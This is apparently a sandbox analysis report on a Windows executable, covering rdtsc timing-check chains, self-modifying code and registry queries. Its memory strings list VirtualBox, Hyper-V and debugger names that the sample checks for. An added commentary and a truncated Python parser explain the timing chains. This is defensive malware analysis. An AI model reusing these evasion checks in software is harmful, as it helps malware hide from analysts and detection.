Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED078B second address: 6ED079B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dh, ch 0x00000008 popad 0x00000009 pop ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0BB4 second address: 6ED0BBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0BBA second address: 6ED0BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0AEE3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F20A0D second address: 6F20A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F20A15 second address: 6F20A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6E8B0AEE5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0C1A second address: 6EF0C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0C1E second address: 6EF0C4C instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FB6E8B0AEE6h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB6E8B0AEDAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0C4C second address: 6EF0C52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0C52 second address: 6EF0CDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, D9h 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d mov bh, 83h 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 and esp, FFFFFFF0h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB6E8B0AEDEh 0x0000001d sub eax, 2EAF33B8h 0x00000023 jmp 00007FB6E8B0AEDBh 0x00000028 popfd 0x00000029 popad 0x0000002a sub esp, 44h 0x0000002d jmp 00007FB6E8B0AEE6h 0x00000032 xchg eax, ebx 0x00000033 jmp 00007FB6E8B0AEE0h 0x00000038 push eax 0x00000039 pushad 0x0000003a push ebx 0x0000003b pushfd 0x0000003c jmp 00007FB6E8B0AEDCh 0x00000041 or esi, 741B5878h 0x00000047 jmp 00007FB6E8B0AEDBh 0x0000004c popfd 0x0000004d pop ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0CDC second address: 6EF0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0CE0 second address: 6EF0CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0CE4 second address: 6EF0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FB6E8B0C7EAh 0x0000000f adc al, FFFFFFD8h 0x00000012 jmp 00007FB6E8B0C7EBh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB6E8B0C7F5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D20 second address: 6EF0D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D26 second address: 6EF0D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c jmp 00007FB6E8B0C7EDh 0x00000011 xchg eax, edi 0x00000012 jmp 00007FB6E8B0C7EEh 0x00000017 push eax 0x00000018 pushad 0x00000019 movsx edi, cx 0x0000001c movzx ecx, bx 0x0000001f popad 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 pop edx 0x00000026 jmp 00007FB6E8B0C7EAh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D68 second address: 6EF0D91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB6E8B0AEE5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D91 second address: 6EF0D96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D96 second address: 6EF0E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+24h], 00000000h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FB6E8B0AEE5h 0x00000016 sub esi, 3C4C1AA6h 0x0000001c jmp 00007FB6E8B0AEE1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FB6E8B0AEE0h 0x00000028 xor al, 00000048h 0x0000002b jmp 00007FB6E8B0AEDBh 0x00000030 popfd 0x00000031 popad 0x00000032 lock bts dword ptr [edi], 00000000h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FB6E8B0AEDBh 0x00000040 add ax, 0A8Eh 0x00000045 jmp 00007FB6E8B0AEE9h 0x0000004a popfd 0x0000004b push eax 0x0000004c pop edx 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0E2B second address: 6EF0E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov esi, 247ACAABh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FB758F6DDE0h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop eax 0x00000019 mov ecx, edi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0E47 second address: 6EF0EEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e call 00007FB6E8B0AEE3h 0x00000013 mov cx, C84Fh 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop esi 0x0000001a pushad 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB6E8B0AEE7h 0x00000022 or esi, 3DC5A00Eh 0x00000028 jmp 00007FB6E8B0AEE9h 0x0000002d popfd 0x0000002e mov cx, E117h 0x00000032 popad 0x00000033 mov cx, 77B3h 0x00000037 popad 0x00000038 pop ebx 0x00000039 jmp 00007FB6E8B0AEE6h 0x0000003e mov esp, ebp 0x00000040 jmp 00007FB6E8B0AEE0h 0x00000045 pop ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0EEE second address: 6EF0EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0EF2 second address: 6EF0EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0EF6 second address: 6EF0EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F308A4 second address: 6F308AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F308AA second address: 6F308B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0C7EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F308B9 second address: 6F308BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F308BD second address: 6F30914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB6E8B0C7EEh 0x00000013 sbb cl, FFFFFFF8h 0x00000016 jmp 00007FB6E8B0C7EBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB6E8B0C7F8h 0x00000022 and ecx, 1BCFFB58h 0x00000028 jmp 00007FB6E8B0C7EBh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30914 second address: 6F30919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F2090C second address: 6F20910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F20910 second address: 6F20916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30BC4 second address: 6F30BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov bx, 3560h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FB6E8B0C7F0h 0x00000017 mov ax, 62C1h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30BEB second address: 6F30C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEDDh 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 mov edi, 0C1CB81Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 mov eax, edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30C56 second address: 6F30C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30C5A second address: 6F30C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30C6D second address: 6F30C77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2785B46Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA097D second address: 6FA0981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0981 second address: 6FA0987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0987 second address: 6FA098D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA098D second address: 6FA0991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0991 second address: 6FA09A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA09A0 second address: 6FA09B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA09B7 second address: 6FA09E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6E8B0AEDCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA09E3 second address: 6FA09E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA09E9 second address: 6FA09ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA09ED second address: 6FA09FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, ax 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA09FF second address: 6FA0A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0AEE9h 0x00000009 sbb esi, 4B6370C6h 0x0000000f jmp 00007FB6E8B0AEE1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB6E8B0AEE0h 0x0000001b jmp 00007FB6E8B0AEE5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FB6E8B0AEDDh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0A6F second address: 6FA0A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0A75 second address: 6FA0A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0A79 second address: 6FA0ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dl, byte ptr [ebp+14h] 0x0000000b jmp 00007FB6E8B0C7EFh 0x00000010 mov eax, dword ptr [ebp+10h] 0x00000013 jmp 00007FB6E8B0C7F6h 0x00000018 and dl, 00000007h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FB6E8B0C7EAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0ABD second address: 6FA0AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0AC3 second address: 6FA0AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0AC9 second address: 6FA0ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0ACD second address: 6FA0B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007FB6E8B0C7F9h 0x00000018 sbb ecx, 568A5906h 0x0000001e jmp 00007FB6E8B0C7F1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0B25 second address: 6FA0B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0AEDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0B35 second address: 6FA0B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0B39 second address: 6FA0B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB758EE0587h 0x0000000e pushad 0x0000000f pushad 0x00000010 movsx edi, si 0x00000013 call 00007FB6E8B0AEE4h 0x00000018 pop eax 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007FB6E8B0AEDBh 0x00000020 xor ecx, 44903D9Eh 0x00000026 jmp 00007FB6E8B0AEE9h 0x0000002b popfd 0x0000002c popad 0x0000002d sub ecx, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FB6E8B0AEDAh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0B9D second address: 6FA0BB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0BB3 second address: 6FA0BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0BB9 second address: 6FA0BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F80DAD second address: 6F80DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Special instruction interceptor: First address: 14D1BDB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Special instruction interceptor: First address: 16AB5DF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Special instruction interceptor: First address: 14D1C87 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Special instruction interceptor: First address: 16894FF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Special instruction interceptor: First address: 1714449 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00FD9980 rdtsc 2_2_00FD9980
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DF255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,2_2_00DF255D
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DF29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,2_2_00DF29FF
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DF255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,2_2_00DF255D
Source: ZFttiy4Tt8.exe, ZFttiy4Tt8.exe, 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ZFttiy4Tt8.exe, 00000002.00000003.2181450137.0000000000871000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: ZFttiy4Tt8.exe | Binary or memory string: Hyper-V RAW
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: ZFttiy4Tt8.exe, 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ZFttiy4Tt8.exe, 00000002.00000003.2245160009.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2245507787.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2245681121.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2246724271.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000002.2285765840.00000000008D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Process information queried: ProcessInformation
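The RDTSC entries above are Joe Sandbox's dump of every rdtsc pair it intercepted: each entry names the address of one rdtsc, the address of the next one, and the instructions executed in between. Read one at a time they say little; read together they show chains of back-to-back counter reads (the second address of one entry is the first address of the next) separated by register shuffling, with only a few pairs containing a compare, arithmetic, a call or a conditional jump where the measured delta is actually consumed. The Python below is an added example for this report, not code from the report or from the sample: it parses that entry format, reconstructs the chains, and splits each pair's filler into shuffling versus logic. The sample lines are copied from the report; the shuffling/logic mnemonic split is this example's own heuristic. The report's memory strings mention Oreans.vxd and Software\WinLicense, and junk-padded rdtsc chains are what such protectors emit, but that attribution is an inference here, not a statement of the report.

```python
"""Parse Joe Sandbox 'RDTSC instruction interceptor' entries and rebuild the rdtsc chains.

Added example for this report.  SAMPLE_LINES are copied from the report; the
SHUFFLE set (what counts as filler) is a heuristic chosen for this example.
"""
import re
from dataclasses import dataclass

# Entries copied from the report (the "Source: ..." cell is ignored by the parser).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F20910 second address: 6F20916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
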